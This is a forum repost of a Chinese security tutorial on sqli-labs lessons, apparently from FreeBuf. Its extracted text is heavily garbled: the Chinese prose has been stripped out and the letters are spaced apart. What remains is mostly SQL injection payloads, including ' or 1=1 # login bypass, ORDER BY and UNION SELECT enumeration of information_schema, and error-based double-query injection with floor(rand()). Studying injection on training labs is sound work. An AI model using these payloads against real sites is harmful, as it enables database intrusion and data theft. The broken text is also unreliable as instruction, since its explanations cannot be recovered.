[10823] 2016-12-13_安全科普:SQLiLabs指南(Part3)

文档创建者:s7ckTeam
浏览次数:5
最后更新:2025-01-18
2016-12-13_安全科普:SQLiLabs指南(Part3) S Q L i   L a b s   P a r t   3 h o u j i n g y i   F r e e B u f   2 0 1 6 - 1 2 - 1 3 F r e e b u f S Q L i   L a b s S Q L i   L a b s     P a r t   1 S Q L i   L a b s     P a r t   2 S Q L i   L a b s y o u t u b e g i t h u b S Q L y o u t u b e s q l i - l a b s ( ) s q l i - l a b s ( ) s q l i - l a b s ( ) x p   s p 3 + x a m p p 使 f i r e f o x + h a c k b a r + t a m p e r   d a t a + C o o k i e   E d i t o r G E T     B l i n d     T i m e   b a s e d     S i n g l e   Q u o t e s ( - - )
使 m y s q l i f ( c o n d i t i o n , A , B ) c o n d i t i o n t r u e c o n d i t i o n f a l s e B a s c i i 1 2 0 1 0
s q l i - l a b s s q l l e s s 1 - 1 0 p y t h o n s l e e p ( 0 . 1 ) s l e e p ( x ) x s l e e p ( 0 . 1 ) 0 . 0 8 s l e e p ( 0 . 1 ) s q l s l e e p ( 0 . 1 ) G E T     B l i n d     T i m e   b a s e d     d o u b l e   q u o t e s ( - - )
P O S T     E r r o r   B a s e d     S i n g l e   q u o t e s     S t r i n g ( - - ) S Q L s e l e c t   *   f r o m   w h e r e   u s e r n a m e =   a n d   p a s s w o r d =   L I M I T   0 , 1 1   o r   1 = 1   #
D u m b D u m b 1   o r d e r   b y   3 # 1   o r d e r   b y   2 # S Q L s e l e c t   c o l 1 , c o l 2   f r o m   w h e r e   u s e r n a m e =   a n d   p a s s w o r d =   L I M I T   0 , 1
1   u n i o n   s e l e c t   d a t a b a s e ( ) , v e r s i o n ( )   # 1   u n i o n   s e l e c t   1 , t a b l e _ n a m e   f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   w h e r e   t a b l e _ s c h e m a = s e c u r i t y   l i m i t   0 , 1 #
f r e e b u f y o u t u b e P O S T     E r r o r   B a s e d     D o u b l e   q u o t e s     S t r i n g     w i t h   t w i s t ( - - - )
S Q L s e l e c t   *   f r o m   w h e r e   u s e r n a m e = ( )   a n d   p a s s w o r d = ( )   L I M I T   0 , 1 1 )   o r   1 = 1   # D u m b D u m b P O S T     D o u b l e   I n j e c t i o n     S i n g l e   q u o t e s     S t r i n g     w i t h   t w i s t ( - - - )
S Q L s e l e c t   *   f r o m   w h e r e   u s e r n a m e = ( )   a n d   p a s s w o r d = ( )   L I M I T   0 , 1 1 )   o r   1 = 1   # 1 ) a n d   ( s e l e c t   c o u n t ( * ) , c o n c a t ( 0 x 3 a , 0 x 3 a , ( s e l e c t   d a t a b a s e ( ) ) , 0 x 3 a , 0 x 3 a , f l o o r ( r a n d ( ) * 2 ) )   a s   a   f r o m   i n f o r m a t i o n _ s c h e m a . c o l u m n s   g r o u p   b y   a )   #
O p e r a n d   s h o u l d   c o n t a i n   1   c o l u m n ( s ) 1 )   a n d   ( s e l e c t   1   f r o m ( s e l e c t   c o u n t ( * ) , c o n c a t ( 0 x 3 a , 0 x 3 a , ( s e l e c t   d a t a b a s e ( ) ) , 0 x 3 a , 0 x 3 a , f l o o r ( r a n d ( ) * 2 ) )   a s   a   f r o m   i n f o r m a t i o n _ s c h e m a . c o l u m n s   g r o u p   b y   a ) )   # E v e r y   d e r i v e d   t a b l e   m u s t   h a v e   i t s   o w n   a l i a s 1 )   a n d   ( s e l e c t   1   f r o m ( s e l e c t   c o u n t ( * ) , c o n c a t ( 0 x 3 a , 0 x 3 a , ( s e l e c t   d a t a b a s e ( ) ) , 0 x 3 a , 0 x 3 a , f l o o r ( r a n d ( ) * 2 ) )   a s   a   f r o m   i n f o r m a t i o n _ s c h e m a . c o l u m n s   g r o u p   b y   a ) b )   # r a n d
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则